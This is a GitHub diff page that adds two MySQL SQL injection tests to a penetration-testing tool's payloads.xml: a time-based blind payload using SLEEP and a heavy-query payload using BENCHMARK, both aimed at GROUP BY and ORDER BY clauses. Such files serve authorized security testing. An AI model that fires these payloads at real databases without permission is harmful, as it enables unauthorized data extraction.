You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: xml/payloads.xml
+43Lines changed: 43 additions & 0 deletions
Original file line number
Diff line number
Diff line change
@@ -2836,6 +2836,49 @@ Formats:
2836
2836
<!-- End of OR time-based blind tests -->
2837
2837
2838
2838
2839
+
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
2840
+
<test>
2841
+
<title>MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
2842
+
<stype>5</stype>
2843
+
<level>3</level>
2844
+
<risk>2</risk>
2845
+
<clause>2,3</clause>
2846
+
<where>1</where>
2847
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2848
+
<request>
2849
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2850
+
</request>
2851
+
<response>
2852
+
<time>[DELAYED]</time>
2853
+
</response>
2854
+
<details>
2855
+
<dbms>MySQL</dbms>
2856
+
<dbms_version>>= 5.0.11</dbms_version>
2857
+
</details>
2858
+
</test>
2859
+
2860
+
<test>
2861
+
<title>MySQL < 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2862
+
<stype>5</stype>
2863
+
<level>4</level>
2864
+
<risk>2</risk>
2865
+
<clause>2,3</clause>
2866
+
<where>1</where>
2867
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2868
+
<request>
2869
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2870
+
</request>
2871
+
<response>
2872
+
<time>[DELAYED]</time>
2873
+
</response>
2874
+
<details>
2875
+
<dbms>MySQL</dbms>
2876
+
</details>
2877
+
</test>
2878
+
<!-- TODO: add tests for other DBMSes -->
2879
+
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
2880
+
2881
+
2839
2882
<!-- UNION query tests -->
2840
2883
<test>
2841
2884
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
0 commit comments